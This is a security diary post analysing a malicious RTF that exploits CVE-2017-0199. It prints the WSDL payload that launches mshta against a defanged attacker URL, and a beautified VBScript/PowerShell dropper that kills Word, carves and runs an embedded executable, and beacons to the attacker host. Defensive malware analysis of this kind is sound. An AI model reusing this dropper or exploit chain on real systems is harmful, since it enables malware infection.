Interesting VBA Dropper

Published: 2017-11-07. Last Updated: 2017-11-07 07:36:16 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Here is another sample that I found in my spam trap. The technique to infect the victim's computer is interesting. I captured a mail with a malicious RTF document (SHA256: c247929d3f5c82247db9102d2dec28c27f73dc0824f8b386f92aad1a22fd8edd)[1] that exploits the OLE2Link vulnerability (CVE-2017-0199[2]). Once opened, the document fetches the following URL:

hxxp://newsshopper[.]info/news/tp.php?thread=0

It returns the XML content:

<definitions
    xmlns="http://schemas.xmlsoap.org/wsdl/";
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/";
    xmlns:suds="http://www.w3.org/2000/wsdl/suds";
    xmlns:tns="http://schemas.microsoft.com/clr/ns/System";
    xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">;
    <portType name="PortType"/>
    <binding name="Binding" type="tns:PortType">
        <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>;
        <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
    </binding>
    <service name="Service">
        <port name="Port" binding="tns:Binding">
            <soap:address location="http://localhost_C:\Windows\System32\mshta.exe_hxxp://newsshopper[.]info/news/t.php?thread=0"/>;
                        <soap:address location="\\;\\;
                                System.Diagnostics.Process.Start(_url.Split('_')[1], _url.Split('_')[2]);
                         //"/>
        </port>
    </service>

This XML code spawns the mshta.exe to grab a second URL that returns an obfuscated VBA script:

(Note: the script has been beautified for better readability)

<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Dim o,kw,cr1,cr2,ps,d,l,r,wv
Set o = CReAtEOBJECt(WsCriPt.SHeLL)
wd=o.expAnDenvIRonMEnTStrings(%sYStemROOt%)

ps= wd & "\sYSteM32\windowspowershell\v1.0\powershell.exe -WindowStyle Hidden "
kw = "taskkill /f /im winword.exe;"
d="$"
l="["
r="]"
cr1="ri -Path """"""HKCU:\Software\Microsoft\Office\"
cr2="\Word\Resiliency"""""" -recurse;"

o.run ps "
Try
{
  $ada="$env:APPDATA\result.exe"
  $adax=$ada+'x'
  $f=[System.IO.File]::Create($adax)
  $tmf="$env:TEMP\o.tmp"
  taskkill /f /im winword.exe

  Function pr
  {
      Try
      {
          $k="HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\";
          for ($i = 0; $i -lt 10; $i++)
          {
              $r=[System.Text.Encoding]::Unicode.GetString((Get-ItemProperty $k).((Get-Item $k).Property[$i]));
              if ($r.Contains('.doc'))
              {
                  $i=10;
              }
          }
          $r=$r.Substring($r.indexOf(':\')-1);
          $r=$r.Substring(0, $r.IndexOf('.doc')+4);
          Remove-Item -Path "HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency" -recurse;
          Copy-Item -Path $r -Destination $tmf;
          $d = (Get-Content $tmf -ReadCount 0 -encoding byte)[1736901..1757380];
          Start-Sleep -s 1;
          Set-Content $r -encoding byte -Value $d;
          start winword "$r";
          $f = (Get-Content $tmf -ReadCount 0 -encoding byte)[62654..1736893];
          Set-Content $ada -encoding byte -Value $f;
          &$ada;
          $wc = New-Object system.Net.WebClient;
          $ht=$wc.downloadString('hxxp://newsshopper[.]info/news/t.php?act=hit');
          $cd=(Resolve-Path .\).Path
          Remove-Item " $cd\*" -include http*.pdb, http*.dll, *.cs;" & "
      }
      Catch
      {
      }
  };
  $wv='12.0';
  pr;
  $wv='14.0';
  pr;
  $wv='15.0';
  pr;"
  $wv='16.0';
  pr;
  Stop-Process -processname powershell;
}
Catch{
  exit;
}",0,true
self.close
</script>

Basically, what the script does:

It kills the existing winword.exe processes. For different versions of Microsoft Office (from 12.0 to 16.0), it scans the latest opened documents and extracts the one that was just opened. From the original document, another one is extracted at offset 1736901 (0x1A80C5) and a new Word instance is spawned to display it. It's just a simple form, not malicious (SHA256: c73573f83fe53cb076c5cc1156c1356f4e92424a9f1824511327fcf4dfc70c79). In parallel, the original is also padded with a PE file starting at offset 62654 (0xF4BE):

0000f4b0  69 6f 6e 68 69 67 68 ba  ba ba ba ba ba ba 4d 5a  |ionhigh.......MZ|
0000f4c0  90 00 03 00 00 00 04 00  00 00 ff ff 00 00 b8 00  |................|
0000f4d0  00 00 00 00 00 00 40 00  00 00 00 00 00 00 00 00  |......@.........|
0000f4e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
0000f4f0  00 00 00 00 00 00 00 00  00 00 00 01 00 00 0e 1f  |................|
0000f500  ba 0e 00 b4 09 cd 21 b8  01 4c cd 21 54 68 69 73  |......!..L.!This|
0000f510  20 70 72 6f 67 72 61 6d  20 63 61 6e 6e 6f 74 20  | program cannot |
0000f520  62 65 20 72 75 6e 20 69  6e 20 44 4f 53 20 6d 6f  |be run in DOS mo|
0000f530  64 65 2e 0d 0d 0a 24 00  00 00 00 00 00 00 7e 04  |de....$.......~.|
0000f540  fc 49 3a 65 92 1a 3a 65  92 1a 3a 65 92 1a 8e f9  |.I:e..:e..:e....|
0000f550  63 1a 33 65 92 1a 8e f9  61 1a 40 65 92 1a 8e f9  |c.3e....a.@e....|
0000f560  60 1a 22 65 92 1a 01 3b  91 1b 28 65 92 1a 01 3b  |`."e...;..(e...;|
0000f570  96 1b 28 65 92 1a 01 3b  97 1b 1f 65 92 1a 33 1d  |..(e...;...e..3.|
0000f580  01 1a 3f 65 92 1a 3a 65  93 1a 58 65 92 1a a8 3b  |..?e..:e..Xe...;|
0000f590  97 1b 3b 65 92 1a a8 3b  6d 1a 3b 65 92 1a a8 3b  |..;e...;m.;e...;|
0000f5a0  90 1b 3b 65 92 1a 52 69  63 68 3a 65 92 1a 00 00  |..;e..Rich:e....|
0000f5b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 50 45  |..............PE|
0000f5c0  00 00 4c 01 06 00 5e 2a  ff 59 00 00 00 00 00 00  |..L...^*.Y......|
0000f5d0  00 00 e0 00 02 01 0b 01  0e 00 00 b8 03 00 00 5c  |...............\|

The file is extracted and executed (SHA256: a561c28196d1736345e1dc49edc97d3f8499236da2e92f4da97ff307de3d1db8).

The VBA script also downloads another PE file (SHA256: 2cb8b35ca2c74fae08d4fa319a86e12d7a90860bafc8276394359f9fc704874f) but it seems to be unused(?). 

[1] https://www.virustotal.com/#/file/c247929d3f5c82247db9102d2dec28c27f73dc0824f8b386f92aad1a22fd8edd/detection
[2] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Tuesday, November 7th 2017 https://isc.sans.edu/podcastdetail.html?id=5744

Comments


Diary Archives